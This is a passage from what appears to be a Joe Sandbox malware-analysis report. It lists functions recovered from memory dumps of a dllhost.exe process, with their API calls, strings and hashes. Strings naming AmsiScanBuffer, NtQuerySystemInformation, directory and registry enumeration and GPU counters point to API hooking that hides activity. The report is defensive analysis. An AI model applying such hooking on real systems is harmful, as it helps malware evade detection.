NtResumeThread, xrefs: 0000025DC1CE1EC2
PdhGetRawCounterArrayW, xrefs: 0000025DC1CE1FD0

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 4598a3b18a1ec82ad7ad8bd4f2e8a819fc60e642f4438dcd7e8d5b934ff5531d
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 7551A7A0610E6AA5EB20DFE4EE4DBD4A320BB71397F814513F40983275DE78C29AC34D

Function 0000025DC1AC12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000025DC1AC1315
GetProcessHeap.KERNEL32 ref: 0000025DC1AC1323
HeapAlloc.KERNEL32 ref: 0000025DC1AC1334
RegEnumValueW.ADVAPI32 ref: 0000025DC1AC1393

Part of subcall function 0000025DC1AC1530: StrCmpIW.SHLWAPI ref: 0000025DC1AC1561

GetProcessHeap.KERNEL32 ref: 0000025DC1AC13DB
HeapAlloc.KERNEL32 ref: 0000025DC1AC13E9
GetProcessHeap.KERNEL32 ref: 0000025DC1AC1406
HeapFree.KERNEL32 ref: 0000025DC1AC1414
lstrlenW.KERNEL32 ref: 0000025DC1AC141D
GetProcessHeap.KERNEL32 ref: 0000025DC1AC142B
HeapAlloc.KERNEL32 ref: 0000025DC1AC1439
StrCpyW.SHLWAPI ref: 0000025DC1AC145B
GetProcessHeap.KERNEL32 ref: 0000025DC1AC1472
HeapFree.KERNEL32 ref: 0000025DC1AC1480

Strings

d, xrefs: 0000025DC1AC1356

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: ebc526c350d9f76c70a513f847cd1794edf41d13c8705814d43992ffaeeb6a91
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: C6517C72200F94DAEB24EFA2E95839AB7A1F799F9AF444125DE4987718DF3CC046C704

Function 0000025DC1CE12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000025DC1CE1315
GetProcessHeap.KERNEL32 ref: 0000025DC1CE1323
HeapAlloc.KERNEL32 ref: 0000025DC1CE1334
RegEnumValueW.ADVAPI32 ref: 0000025DC1CE1393

Part of subcall function 0000025DC1CE1530: StrCmpIW.SHLWAPI ref: 0000025DC1CE1561

GetProcessHeap.KERNEL32 ref: 0000025DC1CE13DB
HeapAlloc.KERNEL32 ref: 0000025DC1CE13E9
GetProcessHeap.KERNEL32 ref: 0000025DC1CE1406
HeapFree.KERNEL32 ref: 0000025DC1CE1414
lstrlenW.KERNEL32 ref: 0000025DC1CE141D
GetProcessHeap.KERNEL32 ref: 0000025DC1CE142B
HeapAlloc.KERNEL32 ref: 0000025DC1CE1439
StrCpyW.SHLWAPI ref: 0000025DC1CE145B
GetProcessHeap.KERNEL32 ref: 0000025DC1CE1472
HeapFree.KERNEL32 ref: 0000025DC1CE1480

Strings

d, xrefs: 0000025DC1CE1356

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 32303dcd766fb764d496be8c80a3e53bb21284a0d6ea89a78d25052e09c12752
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 77515C72200B94D6E720CFA2E94839AB7A1F799F9AF448126EF4987758DF3CC059C704

Function 0000025DC1ACEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000025DC1ACF34A,?,?,00000000,0000025DC1ACF2CD), ref: 0000025DC1ACEFF5
GetLastError.KERNEL32(?,?,00000000,0000025DC1ACF2CD), ref: 0000025DC1ACF007
LoadLibraryExW.KERNEL32(?,?,00000000,0000025DC1ACF2CD), ref: 0000025DC1ACF049
VirtualProtect.KERNEL32 ref: 0000025DC1ACF0A5
VirtualProtect.KERNEL32 ref: 0000025DC1ACF0D6
FreeLibrary.KERNEL32(?,?,00000000,0000025DC1ACF2CD), ref: 0000025DC1ACF11A
GetProcAddress.KERNEL32(?,?,00000000,0000025DC1ACF2CD), ref: 0000025DC1ACF126

Strings

api-ms-, xrefs: 0000025DC1ACF01B
AppPolicyGetProcessTerminationMethod, xrefs: 0000025DC1ACF157, 0000025DC1ACF165
ext-ms-, xrefs: 0000025DC1ACF02E

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: a6d02871b38982e53333aee070536ca563bf2065ad48bb7d31305a1d20a3b887
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 7E51B321700F2495EE34EF969C183A522A0BB69BB3F5847269E3D873D4DF39C447C248

Function 0000025DC1CEEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000025DC1CEF34A,?,?,00000000,0000025DC1CEF2CD), ref: 0000025DC1CEEFF5
GetLastError.KERNEL32(?,?,00000000,0000025DC1CEF2CD), ref: 0000025DC1CEF007
LoadLibraryExW.KERNEL32(?,?,00000000,0000025DC1CEF2CD), ref: 0000025DC1CEF049
VirtualProtect.KERNEL32 ref: 0000025DC1CEF0A5
VirtualProtect.KERNEL32 ref: 0000025DC1CEF0D6
FreeLibrary.KERNEL32(?,?,00000000,0000025DC1CEF2CD), ref: 0000025DC1CEF11A
GetProcAddress.KERNEL32(?,?,00000000,0000025DC1CEF2CD), ref: 0000025DC1CEF126

Strings

ext-ms-, xrefs: 0000025DC1CEF02E
api-ms-, xrefs: 0000025DC1CEF01B
AppPolicyGetProcessTerminationMethod, xrefs: 0000025DC1CEF157, 0000025DC1CEF165

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 5a350e2ab4387a36b47d7cc6d9905231e7147eaa19328ef6dd617ab121339828
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 1051A321701F6491EA359BD69E083A9A350BF69BB3F480726FE39873D0DF38D485C648

Function 0000025DC1AC33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000025DC1AC33FD
GetProcessHeap.KERNEL32 ref: 0000025DC1AC3412
HeapAlloc.KERNEL32 ref: 0000025DC1AC3420
PdhGetCounterInfoW.PDH ref: 0000025DC1AC3436
StrCmpW.SHLWAPI ref: 0000025DC1AC344B

Part of subcall function 0000025DC1AC3950: StrCmpNW.SHLWAPI ref: 0000025DC1AC3972
Part of subcall function 0000025DC1AC3950: StrStrW.SHLWAPI ref: 0000025DC1AC3990
Part of subcall function 0000025DC1AC3950: StrToIntW.SHLWAPI ref: 0000025DC1AC39B7

GetProcessHeap.KERNEL32 ref: 0000025DC1AC3488
HeapFree.KERNEL32 ref: 0000025DC1AC3496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000025DC1AC3444

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 11f9eb63f92c52a7d94c74c3185617a717289839535154da9b149466f3e95398
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 2C31C226600F6096EB31EF92AD18799E3A0FBA8B87F448126DE49C3725DF38C457C344

Function 0000025DC1CE33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000025DC1CE33FD
GetProcessHeap.KERNEL32 ref: 0000025DC1CE3412
HeapAlloc.KERNEL32 ref: 0000025DC1CE3420
PdhGetCounterInfoW.PDH ref: 0000025DC1CE3436
StrCmpW.SHLWAPI ref: 0000025DC1CE344B

Part of subcall function 0000025DC1CE3950: StrCmpNW.SHLWAPI ref: 0000025DC1CE3972
Part of subcall function 0000025DC1CE3950: StrStrW.SHLWAPI ref: 0000025DC1CE3990
Part of subcall function 0000025DC1CE3950: StrToIntW.SHLWAPI ref: 0000025DC1CE39B7

GetProcessHeap.KERNEL32 ref: 0000025DC1CE3488
HeapFree.KERNEL32 ref: 0000025DC1CE3496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000025DC1CE3444

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 38f655867b64cf70a1896ca0e592bddf8c2d87af82f7080d933a4f7851b34863
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 3431C222600E6196E731CF92EE08759E7A0FBA8BC7F448126FE4983724DF38D495C308

Function 0000025DC1AC34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000025DC1AC3516
GetProcessHeap.KERNEL32 ref: 0000025DC1AC3527
HeapAlloc.KERNEL32 ref: 0000025DC1AC3535
PdhGetCounterInfoW.PDH ref: 0000025DC1AC354B
StrCmpW.SHLWAPI ref: 0000025DC1AC3560

Part of subcall function 0000025DC1AC3950: StrCmpNW.SHLWAPI ref: 0000025DC1AC3972
Part of subcall function 0000025DC1AC3950: StrStrW.SHLWAPI ref: 0000025DC1AC3990
Part of subcall function 0000025DC1AC3950: StrToIntW.SHLWAPI ref: 0000025DC1AC39B7

GetProcessHeap.KERNEL32 ref: 0000025DC1AC358D
HeapFree.KERNEL32 ref: 0000025DC1AC359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000025DC1AC3559

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 84075f0257fb664691be9d44846d48c13fc7120fba64147c04bb4ce3d580dfb3
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 7E317331610F659AEB24EFA2AC58759A3E0FBA4F97F448126DE4A83724DF38C457C704

Function 0000025DC1CE34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000025DC1CE3516
GetProcessHeap.KERNEL32 ref: 0000025DC1CE3527
HeapAlloc.KERNEL32 ref: 0000025DC1CE3535
PdhGetCounterInfoW.PDH ref: 0000025DC1CE354B
StrCmpW.SHLWAPI ref: 0000025DC1CE3560

Part of subcall function 0000025DC1CE3950: StrCmpNW.SHLWAPI ref: 0000025DC1CE3972
Part of subcall function 0000025DC1CE3950: StrStrW.SHLWAPI ref: 0000025DC1CE3990
Part of subcall function 0000025DC1CE3950: StrToIntW.SHLWAPI ref: 0000025DC1CE39B7

GetProcessHeap.KERNEL32 ref: 0000025DC1CE358D
HeapFree.KERNEL32 ref: 0000025DC1CE359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000025DC1CE3559

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: d3f10881ed68cb348869dd82af4ccebba7ed5d96b5228bee96d81cc9befbc825
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 67318021610F6186E720DFA2EE48759A3A0FBA4F97F449026FE5A83724DF38D485C704

Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0000000140002192
SysAllocString.OLEAUT32 ref: 00000001400021A2
CoInitializeEx.OLE32 ref: 00000001400021AF
CoInitializeSecurity.OLE32 ref: 00000001400021E6
CoCreateInstance.OLE32 ref: 0000000140002226
VariantInit.OLEAUT32 ref: 0000000140002238
CoUninitialize.OLE32 ref: 00000001400022D2
SysFreeString.OLEAUT32 ref: 00000001400022DB
SysFreeString.OLEAUT32 ref: 00000001400022E4

Memory Dump Source

Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID:
API String ID: 4184240511-0
Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304

Function 0000025DC1ACA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000025DC1ACA289

Part of subcall function 0000025DC1ACB144: __GetUnwindTryBlock.LIBCMT ref: 0000025DC1ACB187
Part of subcall function 0000025DC1ACB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000025DC1ACB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000025DC1ACA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000025DC1ACA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000025DC1ACA6BC

Strings

csm, xrefs: 0000025DC1ACA384
csm, xrefs: 0000025DC1ACA30A
csm, xrefs: 0000025DC1ACA2A3

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: d3e8455ef971ef9dfab9870e7e34315ffe4a89d5c114f04ef6ead15e174fffc2
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 1CD1A372604F508AEF30DFA5D8683AD77A0F7A57CAF104116DE8997B96DB35C482C708

Function 0000025DC1A9962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000025DC1A99689

Part of subcall function 0000025DC1A9A544: __GetUnwindTryBlock.LIBCMT ref: 0000025DC1A9A587
Part of subcall function 0000025DC1A9A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000025DC1A9A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000025DC1A99761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000025DC1A999AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000025DC1A99ABC

Strings

csm, xrefs: 0000025DC1A9970A
csm, xrefs: 0000025DC1A99784
csm, xrefs: 0000025DC1A996A3

Memory Dump Source

Source File: 00000026.00000003.2596028752.0000025DC1A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025DC1A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_3_25dc1a90000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 3f31792923619c66734155cc38f09450e400eecd0182e2b11648118c18b1fa32
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: AED19132604B6496EB70DFA5D88839D37A0F76578AF100116EE8997B9ADF38C0D3C748

Function 0000025DC1CEA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000025DC1CEA289

Part of subcall function 0000025DC1CEB144: __GetUnwindTryBlock.LIBCMT ref: 0000025DC1CEB187
Part of subcall function 0000025DC1CEB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000025DC1CEB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000025DC1CEA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000025DC1CEA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000025DC1CEA6BC

Strings

csm, xrefs: 0000025DC1CEA2A3
csm, xrefs: 0000025DC1CEA30A
csm, xrefs: 0000025DC1CEA384

Memory Dump Source

Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true

Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 825ea2800baecdc338ddfada6da6adfeb040042a4f82c768ede2c8e086ff6e2c
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: ECD1A332504F908AEB30DFA5D94939DB7A4FBA678AF101116FE8997B95CB34C4C0CB04

Function 0000025DC1AC104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000025DC1AC10B1
RegEnumValueW.ADVAPI32 ref: 0000025DC1AC1117
GetProcessHeap.KERNEL32 ref: 0000025DC1AC115A
HeapAlloc.KERNEL32 ref: 0000025DC1AC1168
GetProcessHeap.KERNEL32 ref: 0000025DC1AC1185
HeapFree.KERNEL32 ref: 0000025DC1AC1193

Strings

d, xrefs: 0000025DC1AC10D6

Memory Dump Source

Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true

Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
